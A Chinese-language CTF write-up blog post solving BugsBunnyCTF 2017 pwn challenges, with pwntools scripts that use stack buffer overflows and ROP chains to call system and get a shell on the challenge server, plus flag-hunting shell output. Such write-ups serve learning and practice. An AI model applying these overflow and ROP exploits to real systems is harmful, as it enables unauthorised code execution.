Chybeta

BugsBunnyCTF2017-pwn-writeup

单刷好幸苦。

Pwn50

1
2
3
4
5
You look new here
so this is my gift for you
task : nc 54.153.19.139 5251
just write something when connect , its always UP
Author: TnMch

用了gets,有明显的溢出。题目中有提供了system函数执行。exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
r = remote("54.153.19.139","5251")
v6 = 0x62
v7 = 0x75
v8 = 0x67
v9 = 0xDEFACED
offset = 0x28 - 0x10
payload = 'bug' + 'a' * (offset -3)+ p64(v9)
r.sendline(payload)
r.interactive()

既然可以溢出,也可以用rop来做。exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *
r = remote("54.153.19.139","5251")
elf = ELF("pwn50")
system_addr = elf.symbols['system']
binsh_addr = 0x0000000000400773
pop_rdi_ret_addr = 0x0000000000400743
offset = 56
payload = 'a' * offset
payload += p64(pop_rdi_ret_addr)
payload += p64(binsh_addr)
payload += p64(system_addr)
r.sendline(payload)
r.interactive()

然后我进去后找了好久的flag。以为那个pwn50是文件,结果最后发现是它是个文件夹mdzz。以后找flag可以用命令来帮忙:

1
2
3
4
$ find / -name flag
find: '/root': Permission denied
/home/pwn50/flag
...

最后的flag:

1
Bugs_Bunny{lool_cool_stuf_even_its_old!!!!!}

Pwn100

1
2
3
Try this , maybe little hard
task : nc 54.153.19.139 5252
Author: TnMch

pwn150

用IDA调试后可以看到用fgets读入了192个字节,但起始位置距离rbp只有50个字节,存在溢出,而且程序没有开canary保护。溢出的offset推测为 0x50+8 = 88。

用gdb调试确定为88的偏移。由于程序中会fork出新进程,为调试方便可以在gdb调试开始时先输入set follow-fork-mode parent,然后在对应的地方下断点进行调试。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *
elf = ELF('pwn150')
r = remote("54.153.19.139","5253")
print r.recvuntil("UTC 2017")
print r.recvuntil("Send me your message here:")
system_addr = elf.symbols['system']
sh_addr = elf.search('sh').next()
pop_rdi_ret_addr = 0x0000000000400883
pop_rsi_pop_r15_ret = 0x0000000000400881
offset = 88
payload = 'a' * offset
payload += p64(pop_rdi_ret_addr)
payload += p64(sh_addr)
payload += p64(system_addr)
r.send(payload)
r.interactive()

最后的flag:

1
2
3
4
5
6
7
8
$ ls
pwn150
$ cd pwn150
$ ls
flag
pwn150
$ cat flag
Bugs_Bunny{did_i_help_you_Solve_it!oHH_talk_to_hacker:D}

pwn300

点击赞赏二维码,您的支持将鼓励我继续创作!
chybeta WeChat Pay

微信打赏

chybeta Alipay

支付宝打赏

本文标题:BugsBunnyCTF2017-pwn-writeup

文章作者:chybeta

发布时间:2017年07月30日 - 07:07

最后更新:2017年08月01日 - 20:08

原始链接:http://chybeta.github.io/2017/07/30/BugsBunnyCTF2017-pwn-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。